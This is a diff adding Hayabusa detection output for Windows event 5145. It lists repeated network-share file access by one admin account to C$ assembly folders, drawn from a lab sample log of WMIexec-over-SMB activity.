+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
